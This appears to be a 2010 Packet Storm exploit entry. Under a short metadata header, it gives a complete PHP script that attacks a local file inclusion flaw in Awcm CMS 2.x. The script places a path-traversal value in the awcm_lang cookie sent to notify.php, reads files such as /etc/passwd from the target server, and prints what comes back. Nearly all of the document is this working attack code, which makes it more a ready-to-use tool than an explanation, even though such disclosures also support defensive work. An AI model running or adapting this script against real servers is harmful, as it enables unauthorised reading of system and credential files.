Awcm CMS Local File Inclusion

2010-06-12T00:00:00
ID PACKETSTORM:90573
Type packetstorm
Reporter SwEET-DeViL
Modified 2010-06-12T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Awcm Cms Local File Inclusion Vulnerability  
# Author: SwEET-DeViL  
# Published: 10-6-2010  
# Software Link: http://www.awcm-cms.com/  
# Download Software: http://sourceforge.net/projects/awcm/  
# Version: 2.x  
# Tested on: Lunix  
  
Exploit :  
  
<?php  
  
print("  
------------------------------------------------------------  
| Awcm Cms Local File Inclusion Vulnerability  
| By SwEET-DeViL  
| x0.root(at)gmail.com  
| example  
|  
| Exploit.php ".$argv[0]." example.com /path/ ../../../../../../../../etc/passwd  
------------------------------------------------------------  
");  
$host =$argv[1];//;  
$Path = "http://".$host.$argv[2];  
$CURL_in ="GET ".$Path."/notify.php?v=a HTTP/1.0\r\n";  
$CURL_in.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;  
Windows NT 5.1)\r\n";  
$CURL_in.="Pragma: no-cache\r\n";  
$CURL_in.="Cookie: awcm_lang=".$argv[3]."".";\r\n";  
$CURL_in.="Connection: Close\r\n\r\n";  
  
if ( empty($argv[3]) ){  
echo "\n[-] Error : Exploit failed\n";  
die;  
}  
  
$FoN = @fsockopen($host, 80);  
if(!$FoN){  
echo "\n[-] Error : Can't connect to ".$host." !!\n";  
die;  
}  
  
fputs($FoN, $CURL_in);  
while (!feof($FoN)) $data .= fread($FoN, 1024);  
fclose($FoN);  
  
$error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );  
if ( !empty($error_1) ){  
echo "\n[-] Error : 404 Not Found. \n";  
die;  
}  
  
$error_2 = strstr( $data, "HTTP/1.1 406 Not Acceptable" );  
if ( !empty($error_2) ){  
echo "\n[-] Error : 406 Not Acceptable. \n";  
die;  
}  
  
  
  
$EXc = explode("</head>",$data);  
$EXx = explode("<head>",$EXc[1]);  
$CODE = strip_tags($EXx[0]);  
$CODE2 = preg_replace("/\r|\t/",'',$CODE);  
$CODE2 = trim($CODE2);  
  
if (empty($CODE2)){  
print ('  
  
[-] Error : Sorry! File not Found  
  
');  
}else{  
print ('  
[+]  
------------------------------------------------------------  
').$CODE2;  
  
  
  
print ('  
  
------------------------------------------------------------  
');  
  
}  
  
?>  
  
  
`